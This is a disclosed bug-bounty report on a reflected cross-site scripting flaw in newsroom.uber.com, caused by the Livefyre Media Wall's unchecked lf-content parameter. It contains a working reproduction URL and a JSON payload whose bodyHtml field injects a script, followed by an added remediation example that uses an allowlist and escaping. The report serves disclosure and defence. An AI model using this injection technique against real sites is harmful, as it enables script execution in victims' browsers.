Reflected XSS via Livefyre Media Wall in newsroom.uber.com

Disclosed: 2016-05-09 22:32:18 By mdv To uber
Vulnerability Details
Hello @uber,

This vulnerability works in all sites where there is a [Livefyre Media Wall](http://web.livefyre.com/apps/mediawall/ "Livefyre Media Wall"), including [newsroom.uber.com](https://newsroom.uber.com/ "Uber News").

To reproduce this Cross-Site Scripting, visit this URL:

https://newsroom.uber.com/?lf-content=danylod.com/uber.php?:131560603:307477931

The vulnerable source code is this: https://cdn.livefyre.com/libs/streamhub-permalink/v0.4.1/streamhub-permalink.min.js

The parameter `lf-content` can be controlled to load a JSON file as follows:

```
lf-content=controlled-domain:GET parameter 'collection_id':GET parameter 'content_id'
```

The browser tries to upload content from:

```
https://bootstrap.controlled-domain/api/v3.0/content/thread/?collection_id=GET+parameter+'collection_id'&content_id=GET+parameter+'content_id'&depth_only=false
```

So, on https://bootstrap.danylod.com/uber.php I placed this JSON content:

```
{
  "status": "ok",
  "code": 200,
  "data": {
    "content": [
      {
        "source": 0,
        "collectionId": "131560603",
        "content": {
          "generator": { "id": "livefyre.com" },
          "bodyHtml": "<marquee>XSS</marquee><script>alert(\"XSS on \"+ document.domain)</script>",
          "annotations": { "likedBy": [ "[email protected]" ] },
          "authorId": "[email protected]",
          "createdAt": 1431144598,
          "parentId": "307291329",
          "updatedAt": 1431144598,
          "id": "307477931",
          "ancestorId": "307291329"
        },
        "vis": 1,
        "type": 0,
        "event": 1431269111210110
      }
    ],
    "meta": { "page": 0 },
    "authors": {
      "[email protected]": {
        "displayName": "MDV",
        "tags": [],
        "profileUrl": "https://hackerone.com/mdv",
        "avatar": "https://bootstrap.danylod.com/mdv.png",
        "type": 1,
        "id": "[email protected]"
      }
    }
  }
}
```

Via the JSON parameter `bodyHtml` I can inject HTML code, see screenshot F89055.
Report Stats
  • Report ID: 134061
  • State: Closed
  • Substate: resolved
  • Upvotes: 5
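
One way to close the two gaps the report relies on (an `lf-content` host that is not checked, and `bodyHtml` rendered as markup), shown as an added example that is not Livefyre's or Uber's code and not taken from the report. The allowlist contents and all function names are assumptions made for illustration.

```javascript
// Added example: hypothetical hardened handling of the lf-content parameter.
// ALLOWED_NETWORKS and every function name here are assumptions, not Livefyre's API.
const ALLOWED_NETWORKS = new Set(["livefyre.com"]); // constructed allowlist

// Split "network:collection_id:content_id" and validate each field.
function parsePermalink(lfContent) {
  const parts = String(lfContent).split(":");
  if (parts.length !== 3) return null;
  const [rawNetwork, collectionId, contentId] = parts;
  const network = rawNetwork.toLowerCase();
  // Exact-match allowlist: rejects foreign domains and any value that
  // smuggles a path or query (e.g. "host/page.php?") into the host slot.
  if (!ALLOWED_NETWORKS.has(network)) return null;
  // The IDs in the report are plain decimal numbers.
  const isId = (v) => /^\d{1,20}$/.test(v);
  if (!isId(collectionId) || !isId(contentId)) return null;
  return { network, collectionId, contentId };
}

// Build the bootstrap URL in the shape shown in the report,
// but only from validated parts.
function bootstrapUrl(lfContent) {
  const p = parsePermalink(lfContent);
  if (p === null) return null;
  const url = new URL(`https://bootstrap.${p.network}/api/v3.0/content/thread/`);
  url.searchParams.set("collection_id", p.collectionId);
  url.searchParams.set("content_id", p.contentId);
  url.searchParams.set("depth_only", "false");
  // Defense in depth: the parsed host must be exactly the intended one.
  if (url.hostname !== `bootstrap.${p.network}`) return null;
  return url.toString();
}

// Second layer: render bodyHtml as text unless it has passed an HTML sanitizer.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
```
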